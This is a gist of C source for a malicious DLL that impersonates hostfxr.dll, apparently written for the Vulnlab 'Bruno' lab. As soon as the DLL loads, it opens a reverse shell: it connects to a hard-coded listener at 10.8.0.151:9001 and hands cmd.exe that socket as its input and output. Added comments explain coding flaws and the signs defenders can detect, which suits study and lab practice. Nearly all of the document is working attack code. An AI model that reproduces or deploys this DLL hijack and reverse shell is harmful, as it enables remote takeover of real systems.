@caueb
Created September 18, 2023 11:21
Vulnlab: Bruno (simple reverse shell) DLL hijack.
// Vulnlab: Bruno
// DLL Hijack of hostfxr.dll
#include <winsock2.h>
#include <stdio.h>
#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)
#pragma comment(lib, "ws2_32")
// Thread entry point started from DllMain at DLL_PROCESS_ATTACH.
// Declared with an empty (unspecified) parameter list rather than the single
// LPVOID parameter of LPTHREAD_START_ROUTINE, so the argument CreateThread
// passes is simply ignored. The function never returns normally: it ends in
// exit(0), which terminates the whole host process, not just this thread.
DWORD WINAPI RunMe() {
WSADATA wsaData;
SOCKET wSock;
// Not zero-initialised: only sin_family, sin_port and sin_addr are assigned
// below; sin_zero is left with indeterminate contents.
struct sockaddr_in conn;
// listener ip & port
// Hard-coded callback address and port (lab-specific values). The string
// literal is bound to a non-const char*, where const char* would be correct.
char* ip = "10.8.0.151";
short port = 9001;
// init socket lib
// None of the Winsock calls in this function are checked for failure. If
// WSAStartup, WSASocket or WSAConnect fails, execution still reaches
// CreateProcess with an unusable socket as the child's standard handles,
// and then exit(0).
WSAStartup(MAKEWORD(2, 2), &wsaData);
// create socket
// The last two parameters are DWORDs (group, flags); (unsigned int)NULL is a
// roundabout way of passing 0 for both.
wSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
conn.sin_family = AF_INET;
conn.sin_port = htons(port);
conn.sin_addr.s_addr = inet_addr(ip);
// connect to remote host
// The outbound TCP connection is made by the process that loaded this DLL,
// not by cmd.exe, so network telemetry attributes the connection to the
// hijacked host process.
WSAConnect(wSock, (SOCKADDR*)&conn, sizeof(conn), NULL, NULL, NULL, NULL);
// start cmd.exe with redirected streams
STARTUPINFO si;
PROCESS_INFORMATION pi;
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
// redirect stdin, stdout, stderr to socket
// A SOCKET is a kernel handle, so it is cast straight to HANDLE. Combined
// with bInheritHandles = TRUE in the CreateProcess call, the child inherits
// the socket as all three standard handles. For detection this is the
// recognisable shape: a cmd.exe whose stdin/stdout/stderr are one socket,
// parented by a process that has no business spawning a shell.
si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)wSock;
// CreateProcess's return value is not checked, and pi.hProcess / pi.hThread
// are never closed; both are moot only because the process exits next.
CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
// Terminates the entire host process immediately after spawning the child.
// The child keeps the inherited socket alive; the host's abrupt exit right
// after loading this DLL is itself an observable side effect of the hijack.
exit(0);
}
// DLL entry point. On DLL_PROCESS_ATTACH, i.e. as soon as the host process
// loads this DLL and before any export is called, it starts RunMe on a new
// thread and returns TRUE so the load is reported as successful. Creating a
// thread inside DllMain is discouraged by Microsoft's DllMain guidance
// because the loader lock is held here; this sample does it anyway.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
HANDLE threadHandle;
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
// RunMe ignores its argument, hence NULL. CreateThread's result is not
// checked; closing the handle immediately only drops this reference to
// the thread, it does not stop it.
threadHandle = CreateThread(NULL, 0, RunMe, NULL, 0, NULL);
CloseHandle(threadHandle);
// No break here: control falls through into DLL_THREAD_ATTACH, which only
// breaks, so the fallthrough is harmless but looks unintended.
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
// hModule and lpReserved are unused; there is no default case, so any
// other reason code also just returns TRUE.
return TRUE;
}